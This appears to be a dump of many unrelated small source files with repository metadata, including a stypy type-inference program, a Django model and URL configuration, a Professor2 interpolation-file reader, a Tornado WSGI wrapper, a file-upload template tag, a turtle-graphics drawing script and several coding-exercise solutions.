7: # (Overloads__trunc__) -> <type 'str'>
8:
9:
10: # Call the builtin
11: # No error
12: ret = chr(4)
13:
14: # Type error
15: ret.unexisting_method()
16:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'chr builtin is invoked and its return type is used to call an non existing method')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)
if (__name__ == '__main__'):
# Assigning a Call to a Name (line 12):
# Call to chr(...): (line 12)
# Processing the call arguments (line 12)
int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 12, 14), 'int')
# Processing the call keyword arguments (line 12)
kwargs_4 = {}
# Getting the type of 'chr' (line 12)
chr_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 12, 10), 'chr', False)
# Calling chr(args, kwargs) (line 12)
chr_call_result_5 = invoke(stypy.reporting.localization.Localization(__file__, 12, 10), chr_2, *[int_3], **kwargs_4)
# Assigning a type to the variable 'ret' (line 12)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 12, 4), 'ret', chr_call_result_5)
# Call to unexisting_method(...): (line 15)
# Processing the call keyword arguments (line 15)
kwargs_8 = {}
# Getting the type of 'ret' (line 15)
ret_6 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 4), 'ret', False)
# Obtaining the member 'unexisting_method' of a type (line 15)
unexisting_method_7 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 15, 4), ret_6, 'unexisting_method')
# Calling unexisting_method(args, kwargs) (line 15)
unexisting_method_call_result_9 = invoke(stypy.reporting.localization.Localization(__file__, 15, 4), unexisting_method_7, *[], **kwargs_8)
# ################# End of the type inference program ##################
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
|
[
"redondojose@uniovi.es"
] |
redondojose@uniovi.es
|
5b95e0f5bd0781c50512249533f5bf7221c82ec2
|
227b4fa87c66c9e8e0d159a69e4b86c1c1c910fc
|
/python/ex.py
|
42beae8470046bb8024a5dbf517808a98b139a30
|
[] |
no_license
|
hiddenace0-0/Noob-Projects
|
935e7c87ab87d955401d4468446ca776dff12bc0
|
3cd11f1b5f636d6401ada3e415c62aeb28a4cb43
|
refs/heads/main
| 2023-08-10T18:06:27.450708
| 2021-09-10T14:28:22
| 2021-09-10T14:28:22
| 395,020,022
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
import requests
import json
response = requests.get('https://api.stackexchange.com//2.3/questions?order=desc&sort=activity&site=stackoverflow')
print(response.json())
|
[
"hiddenacez@Aces-Air.cogeco.local"
] |
hiddenacez@Aces-Air.cogeco.local
|
c33dfbd20e756cd9430e020afe1364b92bc051ef
|
0dd3e1a1d78b3a74b336f7082306eff82528d2b3
|
/pyext/professor2/ipolio.py
|
dee1e2555579acf4be09a9db6cad30c1ad66cad1
|
[
"MIT"
] |
permissive
|
iamholger/professor
|
5306db0f9534b159bb98bb31db04aba7b7ce10bc
|
25753a19de0dbbd2db0eb80cedc87adc017459a1
|
refs/heads/master
| 2020-06-14T08:14:46.805475
| 2019-02-04T20:55:14
| 2019-02-04T20:55:14
| 75,209,672
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,091
|
py
|
# -*- python -*-
from professor2.errors import *
from professor2.ipol import *
from professor2.histos import *
class IpolMeta(dict):
def __init__(self, ifile=None):
if ifile:
self.update(self.read_ipolmeta(ifile))
@property
def dim(self):
return int(self.get("Dimension", -1))
@property
def pnames(self):
return self.get("ParamNames", "").split()
@property
def pvalsmin(self):
return [float(x) for x in self.get("MinParamVals", "").split()]
@property
def pvalsmax(self):
return [float(x) for x in self.get("MaxParamVals", "").split()]
@property
def numinputs(self):
return int(self.get("NumInputs", -1))
def read_ipolmeta(self, ifile):
"""
Read in meta data from prof-ipol output 'ifile'
"""
meta = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
for l in ifile.readlines():
## Strip out comments
if "#" in l:
l = l[:l.find("#")]
## Ignore blank / pure whitespace lines
l = l.strip()
if not l:
continue
## Exit if we see the end-of-header indicator
if l == "---":
break
## Extract the key-value pair from the line
try:
key, value = [str.strip(s) for s in l.split(":", 1)]
meta[key] = value
except:
print "Couldn't extract key-value pair from '%s'" % l
return meta
def read_ipolmeta(ifile):
return IpolMeta(ifile)
def read_simpleipols(ifile, paramlimits=None):
"""
Read ipol data back in from ifile.
If the paramlimits argument is non-null, it will be used internally by
the Ipol objects to stabilise the SVD calculation. For this to make sense,
the persisted ipols must have been created with the same scaling factors.
paramlimits should be a 2-tuple of lists for min and max param values
respectively.
"""
IOBJECTS = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
name = ""
for line in ifile.readlines():
sline = line.strip()
if sline.startswith("/"):
name = sline.split()[0]
elif sline.startswith("val"):
IOBJECTS[name] = Ipol(sline)
if paramlimits:
IOBJECTS[name].setParamLimits(*paramlimits)
return IOBJECTS
def read_binnedipols(ifile, paramlimits=None):
"""
Read binned ipol data back in from ifile.
If the paramlimits argument is non-null, it will be used internally by
the Ipol objects to stabilise the SVD calculation. For this to make sense,
the persisted ipols must have been created with the same scaling factors.
paramlimits should be a 2-tuple of lists for min and max param values
respectively.
"""
IHISTOS = {}
if type(ifile) == str:
ifile=open(ifile)
ifile.seek(0)
name = ""
for line in ifile.readlines():
sline = line.strip()
if sline.startswith("/"):
fullpath, sxmin, sxmax = sline.split()
hpath, nbin = fullpath.split("#")
currentib = IpolBin(float(sxmin), float(sxmax), n=int(nbin))
IHISTOS.setdefault(hpath, IpolHisto(path=hpath)).bins.append(currentib)
elif sline.startswith("val"):
currentib.ival = Ipol(sline)
if paramlimits:
currentib.ival.setParamLimits(*paramlimits)
#print currentib.ival.coeffs()
elif sline.startswith("err"):
currentib.ierrs = Ipol(sline)
if paramlimits:
currentib.ierrs.setParamLimits(*paramlimits)
#print currentib.ierrs.coeffs()
# TODO: read back asymm errs as two ipols
return IHISTOS
def read_ipoldata(ifile):
"Return both the metadata object and collection of IpolHistos from a binned ipol file"
imeta = read_ipolmeta(ifile)
if not imeta["DataFormat"].startswith('binned'):
raise IpolIOError("Error, DataFormat of ipol file %s is not binned" % ifile)
df = int(imeta["DataFormat"].split()[-1])
if df<2:
raise IpolIOError("Error, DataFormat '%s' of ipol file %s is not supported by this version of Professor, please recalculate parametrisations." %(imeta["DataFormat"] ,ifile))
paramlimits = None
if bool(int(imeta.get("DoParamScaling", 0))):
if imeta["DataFormat"].endswith('2'):
assert imeta.has_key("MinParamVals") and imeta.has_key("MaxParamVals")
minparamvals = [float(s) for s in imeta["MinParamVals"].split()]
maxparamvals = [float(s) for s in imeta["MaxParamVals"].split()]
paramlimits = (minparamvals, maxparamvals)
# Note, in format 3, the min max values are stored at the end of the coefficient vector
# the Ipol.setParamLimits function is protected agains overwriting those limits
# when reading in format 3
return read_binnedipols(ifile, paramlimits), imeta
|
[
"holger.schulz@durham.ac.uk"
] |
holger.schulz@durham.ac.uk
|
ccd5789da2e4c9864253749d6c74723de2dba159
|
15797ff64b716561d067db5f7d8ad7b7a7d86354
|
/apps/puppies/main/cyclone.py
|
6c0f0354e55c51f15e097bbccf4fa8a0ac939626
|
[
"MIT"
] |
permissive
|
cloudacademy/lab-utils
|
27be7c0d4a87140929250afb3b95b73f066d0082
|
4af0d22ca9a4a7f59bf5d0d02516074496ca6437
|
refs/heads/master
| 2022-12-16T01:42:52.143567
| 2021-06-02T15:49:29
| 2021-06-02T15:49:29
| 71,278,089
| 3
| 4
|
MIT
| 2022-12-07T23:40:12
| 2016-10-18T18:19:55
|
HTML
|
UTF-8
|
Python
| false
| false
| 329
|
py
|
from tornado.wsgi import WSGIContainer
from tornado.ioloop import IOLoop
from tornado.web import FallbackHandler, Application
from app import app
tr = WSGIContainer(app)
application = Application([
(r".*", FallbackHandler, dict(fallback=tr)),
])
if __name__ == "__main__":
application.listen(80)
IOLoop.instance().start()
|
[
"ericovis@gmail.com"
] |
ericovis@gmail.com
|
d1b0c749706d3e9f92703bdbaa8971e4b3b16169
|
8892b25314a97c48426220f0d60d34a4c11bbf99
|
/lista/migrations/0003_post_done.py
|
b97259844a768135f6412c13edc69a87d1950191
|
[] |
no_license
|
mateoosh92/my-first-blog
|
82413b01a0c7627c4cda771f94491ace12b6190b
|
a7f7986a588bf53a9eeca1d3f1cc638d1cea7799
|
refs/heads/master
| 2020-04-16T10:17:30.552068
| 2019-01-16T14:06:10
| 2019-01-16T14:06:10
| 165,498,853
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 380
|
py
|
# Generated by Django 2.1.5 on 2019-01-16 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lista', '0002_auto_20190112_1908'),
]
operations = [
migrations.AddField(
model_name='post',
name='done',
field=models.BooleanField(default=True),
),
]
|
[
"mmaliszewski92@gmail.com"
] |
mmaliszewski92@gmail.com
|
c5e35b6297eb463bcbf83b9b4c9e1ab03d0934c0
|
8687f1f05d92099d0fe5438c4d4d398f8b7cfbf2
|
/blog/models.py
|
fab2ec11871adbf37feab38d5f5694a0d91b6732
|
[] |
no_license
|
yoandresaav/Mircopayments_Systems-Bitcoin-blockchain-
|
5c42d1ecfffd71599a8cb5777091a57a266f6ce4
|
8d32ccac7d005efc966b98ebc787cc7162557bd5
|
refs/heads/master
| 2022-08-21T14:48:43.232923
| 2020-05-26T18:30:28
| 2020-05-26T18:30:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Post(models.Model):# class name is capital. remember that!
title = models.CharField(max_length=30)
tag= models.CharField(max_length=30)
post = models.TextField()
thetime = models.CharField(max_length=12 ,default ="Pre-historic")
writer = models.CharField(max_length=40, default="")
def __str__(self):
return self.title +"|" + str(self.pk)
|
[
"32956678+talktovik@users.noreply.github.com"
] |
32956678+talktovik@users.noreply.github.com
|
e7dd0f7b222db9458f0563e7fdd73a09effbfee1
|
733503f366825edf5f9c12f9d506af327bbb32c9
|
/mysite/urls.py
|
9de2ad9a615de7d454bb68cfa2f44dad7dbaa1d0
|
[] |
no_license
|
momo2010/mysite
|
5a0be098cf79a420921888c05bed13aa067006da
|
7c0756c5d1f2d03d4086e2b6e09dbb2e787cee97
|
refs/heads/master
| 2021-06-28T08:38:34.456649
| 2017-09-18T01:45:18
| 2017-09-18T01:45:18
| 103,877,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 921
|
py
|
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from cmdb import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^index/', views.index),
# url(r'^page/(\d+)', views.page),
url(r'^page/(?P<page>\d+)/(?P<number>\d+)', views.page),
]
|
[
"ppjob@github.com"
] |
ppjob@github.com
|
5aaac03e9abb2d9aa266b4cf69c3fc08101f9d61
|
d1fe787f5970fddcc8ddace34ed885d4c786e233
|
/week 1/drawFlower.py
|
0fb0b7ba0ac0ac3ec4871025e778948dd8a698b0
|
[] |
no_license
|
astraub2/CIS210
|
e7a032883869026aa266efb7ed5d88cd328456af
|
1a50b97a1541141190c3dea5d8ec74f336cccf5d
|
refs/heads/master
| 2021-01-21T06:39:44.856018
| 2017-02-27T04:06:28
| 2017-02-27T04:06:28
| 83,266,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,490
|
py
|
"""
drawflower.py: Draw flower from multiple squares using Turtle graphics
Authors: Amber Straub 95133723
Credits:
CIS 210 assignment 1, Fall 2015.
"""
import argparse # Used in main program to get numSquares and sideLength
# from command line
import time # Used in main program to pause program before exit
import turtle # using turtle graphics
## Constants used by this program
#drawSquare function from page 34 of Miller and Ranum
def drawFlower(numSquares, sideLength):
myturtle=turtle.Turtle()
angel=360/numSquares
for i in range (numSquares):
for i in range (4):
myturtle.forward(sideLength)
myturtle.right(90)
myturtle.right(angel)
def main():
"""
Interaction if run from the command line.
Magic for now; we'll look at what's going on here
in the next week or two.
"""
parser = argparse.ArgumentParser(description="Draw flower using squares")
parser.add_argument("numSquares", type=int,
help="number of squares to use (an integer)")
parser.add_argument("sideLength", type=int,
help="length of side for each square (an integer)")
args = parser.parse_args() # gets arguments from command line
numSquares = args.numSquares
sideLength = args.sideLength
myTurtle = turtle.Turtle()
drawFlower(myTurtle, numSquares, sideLength)
time.sleep(10) # delay for 10 seconds
if __name__ == "__main__":
main()
|
[
"astraub2@uoregon.edu"
] |
astraub2@uoregon.edu
|
d80e2c7471b8fbfd17d1424ea85674f46384669c
|
3c7ce2f591fac6c17a41595a8ab6b7ed831afbe9
|
/deepl/extractors.py
|
551b5ef7f8083e84c6329e89e444ab214b70cb6a
|
[
"MIT"
] |
permissive
|
saatanpion/Discord_Translator_2room
|
5c6a2aa5cbfa30bb21f6c89fca087085995225a4
|
f1d4abe8acf3377c63369b3a4009652e40e28c62
|
refs/heads/main
| 2023-07-01T03:30:08.504258
| 2021-07-29T07:01:19
| 2021-07-29T07:01:19
| 389,615,332
| 0
| 0
|
MIT
| 2021-07-26T11:53:04
| 2021-07-26T11:53:04
| null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
def extract_translated_sentences(json_response):
translations = json_response["result"]["translations"]
translated_sentences = [
translation["beams"][0]["postprocessed_sentence"]
for translation in translations
]
return translated_sentences
def extract_split_sentences(json_response):
return json_response["result"]["splitted_texts"][0]
|
[
"sayonari@pontanuMBA2021.local"
] |
sayonari@pontanuMBA2021.local
|
b6b57348dc2be8a8685ef79ea553cdb8ddee01d5
|
592f4a21b94bf0aaec6983593063ca593d484276
|
/lambdafunction.py
|
2257cf725561340920a26c2a18d15ca752c7341d
|
[] |
no_license
|
ayobablo/Steinserve-python-assignments
|
4ab657b7b19b3a3b2a40d0546039de3a787d3e08
|
f9a03f1bea49025c4c02902dde5b0a23a083a125
|
refs/heads/master
| 2020-12-21T23:16:54.293174
| 2020-01-27T21:51:45
| 2020-01-27T21:51:45
| 236,596,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 74
|
py
|
gg= lambda x:x+2
print (gg(1))
aa=lambda x,y,z:x+y+z
print(aa(1,2,3))
|
[
"noreply@github.com"
] |
ayobablo.noreply@github.com
|
969548608d601ec25b5bd267991480426c174433
|
9b0bdebe81e558d3851609687e4ccd70ad026c7f
|
/算法思想/贪心法/03.摇摆序列.py
|
d9f3e2f8193e6552ada3ed605107ffa9e21e059c
|
[] |
no_license
|
lizenghui1121/DS_algorithms
|
645cdad007ccbbfa82cc5ca9e3fc7f543644ab21
|
9690efcfe70663670691de02962fb534161bfc8d
|
refs/heads/master
| 2022-12-13T22:45:23.108838
| 2020-09-07T13:40:17
| 2020-09-07T13:40:17
| 275,062,257
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
"""
描述:
一个整数序列,如果相邻元素的差恰好正负(负正)交替出现,则认为是摇摆序列,少于2个元素的序列直接是摇摆序列
给一个随机序列,求满足摇摆序列的定义的最长子序列的长度。
示例:
序列1:[1, 7, 4, 9, 2, 5] 摇摆序列:[6, -3, 5, -7, 3]
@Author: Li Zenghui
@Date: 2020-03-31 16:20
"""
# 贪心规律:当序列有一段连续递增或者递减时候,为形成摇摆序列,只保留递增(递减)序列的首尾元素。
def wiggle_max_length(nums):
if len(nums) < 2:
return len(nums)
state = 'begin'
max_length = 1
for i in range(1, len(nums)):
if state == 'begin':
if nums[i-1] < nums[i]:
state = 'up'
max_length += 1
elif nums[i-1] > nums[i]:
state = 'down'
max_length += 1
elif state == 'up':
if nums[i-1] > nums[i]:
state = 'down'
max_length += 1
else:
if nums[i-1] < nums[i]:
state = 'up'
max_length += 1
return max_length
if __name__ == '__main__':
print(wiggle_max_length([1, 5, 2, 10, 9, 8]))
print(wiggle_max_length([1, 1, 2, 3, 5, 8]))
print(wiggle_max_length([5, 8, 3]))
|
[
"954267393@qq.com"
] |
954267393@qq.com
|
06038bdfb65cdd0a5211554888e826f071ed73cb
|
8492f9a7c15e8127b05ed826194c4ef9a6023a1a
|
/17/solution.py
|
5a8bca2a03fd50c3d0b0e58c88d2d124bfdf1817
|
[] |
no_license
|
jobe0900/adventofcode2015
|
1eff50be50ac9118d6dd33e13d9c4e25396c2fa4
|
6989c463cc2c2332fef5982e970d2b5c8b7313d0
|
refs/heads/master
| 2021-01-10T09:52:59.866950
| 2016-02-05T13:34:26
| 2016-02-05T13:34:26
| 51,148,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,809
|
py
|
#!/usr/bin/env python3
import itertools
def test():
target = 25
with open("testdata") as f:
lines = f.readlines()
containers = parse_lines(lines)
print("Containers: {}".format(containers))
combs = find_combinations(containers, target)
print("FOUND combinations:")
for c in combs:
print(" {}".format(c))
def first(lines):
target = 150
containers = parse_lines(lines)
combs = find_combinations(containers, target)
print("1. Found {} combinations".format(len(combs)))
return combs
def second(lines):
target = 150
containers = parse_lines(lines)
combs = find_combinations(containers, target)
min_nr_bottles = find_min_nr_bottles_in_combination(combs)
nr_combs_with_min = find_nr_minimal_combinations(min_nr_bottles, combs)
print("2. {} combinations with {} number of bottles".format(nr_combs_with_min, min_nr_bottles))
def find_min_nr_bottles_in_combination(combs):
min_nr_bottles = float('Inf')
for c in combs:
if len(c) < min_nr_bottles:
min_nr_bottles = len(c)
return min_nr_bottles
def find_nr_minimal_combinations(min_nr_bottles, combs):
nr_combs_with_min = 0
for c in combs:
if len(c) == min_nr_bottles:
nr_combs_with_min += 1
return nr_combs_with_min
def find_combinations(containers, target):
combs = []
for i in range(len(containers)):
for comb in itertools.combinations(containers, i):
if sum(comb) == target:
combs.append(comb)
return combs
def parse_lines(lines):
c = []
for line in lines:
c.append(int(line.strip()))
return c
if __name__ == "__main__":
#test()
with open("input") as f:
lines = f.readlines()
first(lines)
second(lines)
|
[
"jobe0900@student.miun.se"
] |
jobe0900@student.miun.se
|
d9f730da7e25eea9b9cbf3b8ca91929fd4f0b8d3
|
35948cb9eadfd2d6ed80361bedbe1579d9712f35
|
/fileupload/templatetags/upload_tags.py
|
fd421596fedefebe74fc3aa342ccb647aeff9d66
|
[] |
no_license
|
KomeijiSatori/mysite
|
010e2e6210a91e683c133d54eec762ba593fd2eb
|
8565018a30a81fc32d904e57b2347f2e24a726c0
|
refs/heads/master
| 2021-04-06T10:48:59.865827
| 2020-08-28T16:45:03
| 2020-08-28T16:45:03
| 83,221,335
| 5
| 1
| null | 2018-02-14T09:01:47
| 2017-02-26T15:58:19
|
Python
|
UTF-8
|
Python
| false
| false
| 3,497
|
py
|
from django import template
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
register = template.Library()
@register.simple_tag
def upload_js():
return mark_safe("""
<!-- The template to display files available for upload -->
<script id="template-upload" type="text/x-tmpl">
{% for (var i=0, file; file=o.files[i]; i++) { %}
<tr class="template-upload fade">
<td>
<span class="preview"></span>
</td>
<td>
<p class="name">{%=file.name%}</p>
{% if (file.error) { %}
<div><span class="label label-danger">{%=locale.fileupload.error%}</span> {%=file.error%}</div>
{% } %}
</td>
<td>
<p class="size">{%=o.formatFileSize(file.size)%}</p>
{% if (!o.files.error) { %}
<div class="progress progress-striped active" role="progressbar" aria-valuemin="0" aria-valuemax="100" aria-valuenow="0"><div class="progress-bar progress-bar-success" style="width:0%;"></div></div>
{% } %}
</td>
<td>
""" + _("To be uploaded") + """
</td>
<td>
{% if (!o.files.error && !i && !o.options.autoUpload) { %}
<button class="btn btn-primary start">
<i class="glyphicon glyphicon-upload"></i>
<span>""" + _("Start") + """</span>
</button>
{% } %}
{% if (!i) { %}
<button class="btn btn-warning cancel">
<i class="glyphicon glyphicon-ban-circle"></i>
<span>""" + _("Cancel") + """</span>
</button>
{% } %}
</td>
</tr>
{% } %}
</script>
<!-- The template to display files available for download -->
<script id="template-download" type="text/x-tmpl">
{% for (var i=0, file; file=o.files[i]; i++) { %}
<tr class="template-download fade">
<td>
<span class="preview">
{% if (file.thumbnailUrl) { %}
<a href="{%=file.url%}" title="{%=file.name%}" download="{%=file.name%}" data-gallery><img src="{%=file.thumbnailUrl%}"></a>
{% } %}
</span>
</td>
<td>
<p><a href="{%=file.url%}" title="{%=file.name%}" download="{%=file.name%}" {%=file.thumbnailUrl?'data-gallery':''%}>{%=file.name%}</a></p>
</td>
<td>
<span class="size">{%=o.formatFileSize(file.size)%}</span>
</td>
<td>
<p class="name">
<button class="btn btn-primary copy-url" data-url="{%=file.full_url%}">
<i class="glyphicon glyphicon-copy"></i>
<span>""" + _("Copy URL") + """</span>
</button>
</p>
{% if (file.error) { %}
<div><span class="label label-danger">{%=locale.fileupload.error%}</span> {%=file.error%}</div>
{% } %}
</td>
<td>
<button class="btn btn-danger delete" data-type="{%=file.deleteType%}" data-url="{%=file.deleteUrl%}"{% if (file.deleteWithCredentials) { %} data-xhr-fields='{"withCredentials":true}'{% } %}>
<i class="glyphicon glyphicon-trash"></i>
<span>""" + _("delete") + """</span>
</button>
<input type="checkbox" name="delete" value="1" class="toggle">
</td>
</tr>
{% } %}
</script>
""")
|
[
"KomeijiSatori07@gmail.com"
] |
KomeijiSatori07@gmail.com
|
083277fc7c133a970f3166b8aa8e562115f140b5
|
06b67ac9f8c10225cead8b5f5d3afb29816f8585
|
/Main.py
|
7b2897bbdd1a02868ba32ccd82005dc7ff84765d
|
[] |
no_license
|
agordo25/Class-work-5-15
|
d9224849a9aca673a80b5a3349aa9625957c3b40
|
a5f88f9a5dc7596315c6a04e601f8c0c5f155db0
|
refs/heads/master
| 2020-03-17T11:35:50.143449
| 2018-05-17T18:15:06
| 2018-05-17T18:15:06
| 133,557,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
from room import Room
# file class
kitchen= Room("kitchen")
kitchen.set_description("A desk and dirty room buzzing with flies.")
dining_hall = Room("Dining Hall")
dining_hall.set_descrpition("A large roo, with ornate golden decorations on each wall.")
ballroom = Room("Ballroom")
ballroom.set_descrpition("A vast room with a shiny floor, Huge candlesticks guard the entrance.")
kitchen.link_room(dining-hall, "south")
dining_hall.link_room(kitchen, "north")
dining_hall.link_room(hallroom, "west")
ballroom.link_room(dining_hall, "east")
|
[
"noreply@github.com"
] |
agordo25.noreply@github.com
|
0c2b3036624182822fb7490d40d6132819d75165
|
4f82f0d47c1ad5fce5cfb01226ee24938ffcbb1d
|
/my_notes/apps/account/urls.py
|
0fadb206b4294167205c4afa67c14cdf32f8c167
|
[] |
no_license
|
khusainovrm/my_notes
|
fe042d9b43423c041c24649e4799b37c889e6b14
|
a672bc233d9327ebb1aeb0cbb161488b3d0ba269
|
refs/heads/master
| 2021-04-16T18:47:18.945225
| 2020-03-26T09:01:15
| 2020-03-26T09:01:15
| 249,376,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
from django.urls import path
from . import views
from django.contrib.auth import views as auth_views
app_name = "account"
urlpatterns = [
# previous login view
# path('login/', views.user_login, name='login'),
path ('login/', auth_views.LoginView.as_view (), name='login'),
path ('logout/', auth_views.LogoutView.as_view (), name='logout'),
path('', views.dashboard, name='dashboard'),
]
|
[
"37953890+khusainovrm@users.noreply.github.com"
] |
37953890+khusainovrm@users.noreply.github.com
|
73b2a72cf03900d1f809ced86925d237da893e05
|
2ebe38fe3251750fb992d1817cf5249573c8f3dc
|
/hxldash/processing_scripts/topojson_to_gz.py
|
0f35cabb7208ceec0b687f79cc70876672606ab4
|
[
"MIT"
] |
permissive
|
SimonbJohnson/quickX3
|
c4d067aed978fb69a523e856694f5b3f7b9753d3
|
cda54c77ccf76f37246cf033d1266ac029adc36d
|
refs/heads/master
| 2021-06-24T07:47:53.857690
| 2020-11-06T12:27:49
| 2020-11-06T12:27:49
| 168,354,070
| 7
| 3
|
MIT
| 2021-06-10T23:35:10
| 2019-01-30T14:13:22
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 771
|
py
|
import os
import csv
import gzip
#params
cutOffLevel = 4
rootdir = '../static/geoms/topojson/'
#script variables
countries = []
countryList = []
fileList = {}
for subdir, dirs, files in os.walk(rootdir):
for file in files:
filePath = os.path.join(subdir, file)
level = filePath[-11]
country = filePath[-15:-12]
print filePath
print country
print level
if level.isdigit():
inp = '../static/geoms/topojson/'+country+'/'+str(level)
out = '../static/gz/'+country+'/'+str(level)
if not os.path.exists(out):
os.makedirs(out)
with open(inp+'/geom.json', 'rb') as f_in, gzip.open(out+'/geom.gz', 'wb') as f_out:
f_out.writelines(f_in)
|
[
"simonbjohnson@gmail.com"
] |
simonbjohnson@gmail.com
|
c5ec23629e7505139473c17b90cfc7d9f78522f6
|
39c1de5995c11beabb1aebf1ca6d02d45bb73311
|
/day3/day3-1en2.py
|
d022a8536db733544af102298a8052e82766c7bc
|
[] |
no_license
|
Pannekoek-Jona/AdventOfCode2020
|
24d70ac57abc131e176e6635e0ffbc20893e75ee
|
b69103c1bc1b3b6564f6dd8e8d58b08857d61b26
|
refs/heads/main
| 2023-01-24T14:06:40.982321
| 2020-12-10T19:29:50
| 2020-12-10T19:29:50
| 320,365,215
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,261
|
py
|
with open('day3/day3puzzle1.txt', 'r') as f:
treeArray = f.readlines()
trees = 0
place = 0
offset = 0
sum = 1
stepSize = [1, 3, 5, 7]
if __name__ == '__main__':
length = len(treeArray[0]) - 1
for iteration in stepSize:
trees = 0
place = 0
offset = 0
print('íteration = ', iteration)
for line in treeArray[1:]:
place = place + iteration
if line[place] == '#':
trees += 1
if place > length - 1 - iteration:
offset = length - place
place = 0 - offset
print('number of trees in iteration:', iteration, 'is', trees)
sum = sum * trees
print('sum', sum)
count = 1
trees = 0
place = 0
offset = 0
for line in treeArray[1:]:
count += 1
if count % 2 == 1:
place = place + 1
print(line[:place+1])
print(line[place], place)
if line[place] == '#':
trees += 1
if place > length - 1 - 1:
offset = length - place
print('offset', offset)
place = 0 - offset
print(trees)
sum = sum * trees
print(sum)
|
[
"noreply@github.com"
] |
Pannekoek-Jona.noreply@github.com
|
79726d5eb1481d93b134ae06b20764e1f8ebe3eb
|
b20cc38a18bba960ef9b0278cafde833397e506d
|
/plantcv/learn/__init__.py
|
34ad1d8165c9ceeb803b031925faad19db37183f
|
[
"MIT"
] |
permissive
|
judgementc/plantcv
|
c44f1041bedf76f2f146131d594f7acdff26d944
|
6633dc457ffa1e54d1a3b7b8b4653607f23396b6
|
refs/heads/master
| 2021-07-14T22:31:03.750674
| 2017-10-21T12:54:58
| 2017-10-21T12:54:58
| 107,865,158
| 1
| 0
| null | 2017-10-22T12:47:41
| 2017-10-22T12:47:41
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
from naive_bayes import naive_bayes
from naive_bayes import naive_bayes_multiclass
__all__ = ["naive_bayes"]
|
[
"noahfahlgren@gmail.com"
] |
noahfahlgren@gmail.com
|
3610cfe8844edef8cea50aa2954c3dab2e06eaa7
|
41464d5effa3bcbaa1154e18d5a1199b0a36eb9b
|
/Egz/egz3.py
|
e22fc24777e8e153d7677afbbb855f77437a88a9
|
[] |
no_license
|
kziel445/WizualizacjaDanych
|
da14d5dd3a766475c7c99bbceade775a933f263b
|
89ac340efbf88f48d3a31791bf90820917583725
|
refs/heads/master
| 2022-05-27T02:38:44.917593
| 2019-06-24T04:17:06
| 2019-06-24T04:17:06
| 173,711,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
import pandas as pd
import numpy as np
class czas:
def __init__(self,godzina,minuta):
self.godzina = godzina
self.minuta = minuta
def zegar(czas):
if(czas.minuta<10):
czas.minuta="0" + str(czas.minuta)
print(str(czas.godzina) +":"+ str(czas.minuta))
slownik = {i :i*i for i in range(99)}
for x in list(slownik)[94:99]:
print(slownik[x])
zegar(czas(2,10))
df = pd.read_csv("przepis.csv",sep="#")
df = df.set_index(df['Składnik'])
df = df.drop(columns=['Składnik'],axis=0)
df2 = pd.DataFrame([[10,'Sól'],[20,'Jajka']])
df2.columns=['Waga w g','Składniki']
df2 = df2.set_index(df2['Składniki'])
df2 = df2.drop(columns=['Składniki'])
df = df.append(df2)
print(df)
|
[
"noreply@github.com"
] |
kziel445.noreply@github.com
|
c740d3355351568bdd35bb5a83a19d6658521d3f
|
68a66b222a8e81fbbef36e3b26cff16215a21f90
|
/caffeine_buzz.py
|
faa26d3bf351b68659c0c750965f79a43e21377f
|
[] |
no_license
|
jeffwright13/codewars
|
725fd7d19db4b31f1d4c45fbb21f0e2b8f774425
|
92d16edd1441230e7c4ddc466b893e5ba5929e98
|
refs/heads/master
| 2020-04-15T15:02:36.704016
| 2016-11-09T18:38:17
| 2016-11-09T18:38:17
| 53,176,971
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,178
|
py
|
def main():
print caffeineBuzz.__doc__
